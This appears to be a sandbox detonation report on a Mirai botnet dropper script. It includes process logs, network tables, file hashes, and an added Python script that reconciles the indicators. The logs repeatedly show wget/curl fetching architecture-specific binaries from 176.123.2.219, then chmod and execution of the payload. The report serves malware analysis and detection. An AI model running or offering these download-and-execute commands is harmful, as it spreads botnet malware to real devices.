[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto Count
MD 176.123.2.219:80 176.123.2.219 tcp 26
N/A 224.0.0.251:5353 udp 1
US 151.101.193.91:443 tcp 1
GB 89.187.167.8:443 tcp 1
GB 185.125.188.62:443 tcp 1
GB 185.125.188.61:443 tcp 1

The 26 connections to 176.123.2.219:80 are accounted for by the 13 wget and 13 curl processes above. The mDNS multicast and the four HTTPS destinations appear only in this Ubuntu run, are absent from the mipsel run (behavioral4), and correspond to no URL or process in the sample's tree, which only ever references 176.123.2.219; treat them as guest-OS background traffic unless a process can be tied to them.

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846
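Before these indicators go into a blocklist or hunt, the cheap check is to reconcile them against each other: every distinct download URL should explain exactly two TCP connections (wget plus curl), destinations that no URL explains need a separate decision, and a path with several hashes should be understood before any one hash is trusted. The script below does that over the report's own plain-text layout. It is an added example and not part of the report; REPORT is a constructed excerpt that copies the page's process URLs, the behavioral1 connection rows and three of its hash entries, with the prose omitted.

```python
"""Extract and reconcile indicators from a sandbox report in the layout used above.

Added example, not part of the report.  REPORT is a constructed excerpt built
from the page's own URLs, connection rows and hash lines.
"""
import re
from collections import Counter

# Architecture suffixes in the order the process list fetches them.
ARCHES = "x86 mips mpsl arm arm5 arm6 arm7 ppc m68k spc i686 sh4 arc".split()

REPORT = "\n".join(
    [f"[wget http://176.123.2.219/bins/tsuki.{a}]" for a in ARCHES]
    + [f"[curl -O http://176.123.2.219/bins/tsuki.{a}]" for a in ARCHES]
    + ["Country Destination Domain Proto",
       "N/A 224.0.0.251:5353 udp"]
    + ["MD 176.123.2.219:80 176.123.2.219 tcp"] * 26
    + ["US 151.101.193.91:443 tcp",
       "GB 89.187.167.8:443 tcp",
       "GB 185.125.188.62:443 tcp",
       "GB 185.125.188.61:443 tcp",
       "Files",
       "/tmp/tsuki.x86",
       "SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117",
       "/tmp/tsuki",
       "SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0",
       "/tmp/tsuki",
       "SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d"]
)

URL_RE = re.compile(r"\bhttps?://[^\s\]]+")
# "<CC|N/A> <ip>:<port> [<domain>] <proto>" rows of the Network table.
CONN_RE = re.compile(r"^(?:[A-Z]{2}|N/A) (\d{1,3}(?:\.\d{1,3}){3}):(\d+)(?: \S+)? (tcp|udp)$", re.M)
# A path line followed by its hash lines; MD5/SHA1 may precede SHA256.
FILE_RE = re.compile(r"^(/\S+)\n(?:(?:MD5|SHA1) \S+\n){0,2}SHA256 ([0-9a-f]{64})", re.M)


def extract(text):
    """Return distinct URLs, a Counter of (ip, port, proto) and (path, sha256) pairs."""
    urls = sorted(set(URL_RE.findall(text)))
    conns = Counter((ip, int(port), proto) for ip, port, proto in CONN_RE.findall(text))
    files = FILE_RE.findall(text)
    return {"urls": urls, "connections": conns, "files": files}


def reconcile(iocs, fetchers_per_url=2):
    """Cross-check: each URL should explain fetchers_per_url connections to its
    host; any other destination is unexplained and needs its own decision."""
    hosts = Counter(re.match(r"https?://([^/:]+)", u).group(1) for u in iocs["urls"])
    explained, unexplained = {}, []
    for (ip, port, proto), n in iocs["connections"].items():
        if ip in hosts:
            explained[ip] = (n, hosts[ip] * fetchers_per_url)   # (observed, expected)
        else:
            unexplained.append(f"{ip}:{port}/{proto}")
    by_path = {}
    for path, sha in iocs["files"]:
        by_path.setdefault(path, set()).add(sha)
    return {
        "download_host_ok": all(n == expected for n, expected in explained.values()),
        "download_connections": explained,
        "unexplained_destinations": sorted(unexplained),
        "arch_suffixes": sorted(u.rsplit(".", 1)[-1] for u in iocs["urls"]),
        "distinct_hashes": {p: len(s) for p, s in by_path.items()},
    }


if __name__ == "__main__":
    result = reconcile(extract(REPORT))
    for key, value in result.items():
        print(f"{key}: {value}")
```

For this page the reconciliation comes out clean on the download side (26 observed, 26 expected) and isolates the five destinations that no URL explains, which is the list to triage as background traffic rather than to block on the sample's account.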

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-armhf-20240611-en

Max time kernel

21s

Max time network

23s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target Count
N/A /tmp/tsuki /tmp/tsuki N/A 13 (one execution per architecture iteration)

Checks CPU configuration

Tags: antivm

Description Indicator Process Target Count
File opened for reading /proc/cpuinfo /usr/bin/curl N/A 13

(The reading process is the system curl binary, not the sample. Userland libraries open /proc/cpuinfo and /proc/self/auxv for CPU feature detection, and this signature fires only in the armhf run; do not attribute the antivm tag to no.sh or tsuki on this evidence.)

Reads runtime system information

Description Indicator Process Target Count
File opened for reading /proc/self/auxv /usr/bin/curl N/A 13
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A 13

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-mipsbe-20240611-en

Max time kernel

55s

Max time network

58s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
